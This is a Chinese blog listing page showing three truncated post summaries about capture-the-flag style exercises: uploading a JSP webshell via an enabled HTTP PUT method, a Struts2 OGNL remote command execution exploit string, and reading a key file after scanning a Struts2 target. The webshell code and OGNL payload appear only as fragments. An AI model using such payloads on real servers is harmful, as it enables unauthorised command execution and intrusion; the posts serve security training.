摘要:
options查看服务端允许得方法 可以看见有put 那就写一个木马进去 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd( 阅读全文
posted @ 2020-04-23 21:56
cat47
阅读(853)
评论(0)
推荐(0)
摘要:
漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletAc 阅读全文
posted @ 2020-04-23 20:34
cat47
阅读(765)
评论(0)
推荐(0)
摘要:
想起来之前在360众测靶场做过 通过背景可以知道是struts2框架 扫描一下 cat key.txt 阅读全文
posted @ 2020-04-23 20:10
cat47
阅读(1146)
评论(2)
推荐(0)
浙公网安备 33010602011771号